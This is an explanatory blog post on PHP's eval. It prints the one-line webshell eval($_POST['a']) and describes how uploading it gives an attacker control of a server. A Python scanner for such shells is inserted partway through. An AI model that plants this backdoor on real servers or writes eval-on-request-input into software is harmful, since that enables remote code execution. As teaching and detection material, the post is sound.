【php】eval

Eval is rarely used when we write ordinary web pages, but when it comes to security, eval in PHP comes up all the time. So let's talk about what eval actually is.

 

1. The basic use of eval

To explain eval, we first have to start with a piece of code that even a beginner who has only written a PHP Hello World can understand.

First, what is the result of running this code?

<?php
$str = "echo 'abc';";
echo $str;
?>

You probably don't even need a screenshot of the result: it prints echo 'abc';

However, if echo is changed to eval, that is:

<?php
$str = "echo 'abc';";
eval ($str);
?>

Then the output of the program becomes abc.

That is, PHP executed the string echo 'abc'; above as code!

 

2. The use of eval by hackers

Normally, when we write PHP web pages, we simply write whatever code we need. Only in rare cases do we wrap pieces of code in eval, and then mostly to confuse ourselves and the teammates developing with us. So for developers, eval is an unpopular keyword.

But eval is very useful for hackers. For example, a hacker who plants a PHP file on your server, or finds a security hole and uploads a PHP file to it, may use a file as simple as the following.

<?php
eval ($_POST['a']);
?>

It's that simple.

First of all, this PHP file receives a value with the name a submitted by POST. Of course, if the hacker finds POST troublesome, it can be changed to GET, and the parameter can then be passed directly in the browser's address bar. Passing parameters by POST and GET is very basic, so I won't go into details here (see article/details/41908237).

Then, because of the eval, this PHP file executes whatever was passed by POST under the name a. Since PHP can directly manipulate the files on the server, as long as the hacker can get this PHP file onto your server and use a packet capture tool to find the address it was uploaded to, it basically means the hacker can control your server.

It is essentially the same idea as the "kitchen knife" (China Chopper) webshell for JSP.
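The defensive counterpart of the one-line webshell above is to find such files before they are used. The following scanner is an added example (not code from the original post): it walks a directory of PHP files and reports any eval whose argument references a request superglobal, with plain eval of a local variable reported at lower severity. The sample files are constructed inline for illustration.

```python
import re
from pathlib import Path

# Request superglobals, i.e. values an outside client controls.
TAINTED = r"\$_(?:POST|GET|REQUEST|COOKIE)\b"
# eval(...) whose argument mentions a request superglobal, e.g. eval($_POST['a']);
EVAL_TAINTED = re.compile(r"\beval\s*\(\s*[^;]*?" + TAINTED, re.IGNORECASE)
# Any eval at all, reported at lower severity for manual review.
EVAL_ANY = re.compile(r"\beval\s*\(", re.IGNORECASE)


def scan_php(source: str):
    """Return a list of (line_no, severity, line) findings for one PHP source."""
    findings = []
    for no, line in enumerate(source.splitlines(), start=1):
        if EVAL_TAINTED.search(line):
            findings.append((no, "high", line.strip()))
        elif EVAL_ANY.search(line):
            findings.append((no, "low", line.strip()))
    return findings


def scan_tree(root):
    """Scan every *.php file under root; map path -> findings (only files with hits)."""
    results = {}
    for path in Path(root).rglob("*.php"):
        hits = scan_php(path.read_text(errors="replace"))
        if hits:
            results[str(path)] = hits
    return results


# Constructed samples (not taken from any real server).
SHELL = "<?php\neval ($_POST['a']);\n?>\n"           # the webshell from the post
BENIGN = "<?php\n$str = \"echo 'abc';\";\neval ($str);\n?>\n"  # eval of a local string
CLEAN = "<?php\necho 'abc';\n?>\n"                    # no eval at all

if __name__ == "__main__":
    for name, src in (("shell.php", SHELL), ("benign.php", BENIGN), ("clean.php", CLEAN)):
        for no, sev, text in scan_php(src):
            print(f"{name}:{no}: [{sev}] {text}")
```

Run scan_tree() against a web root to get the same findings per file; a "high" hit is worth treating as a probable webshell rather than a false positive.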

That is why, wherever you see a file upload on most websites, the type of the uploaded file is checked.
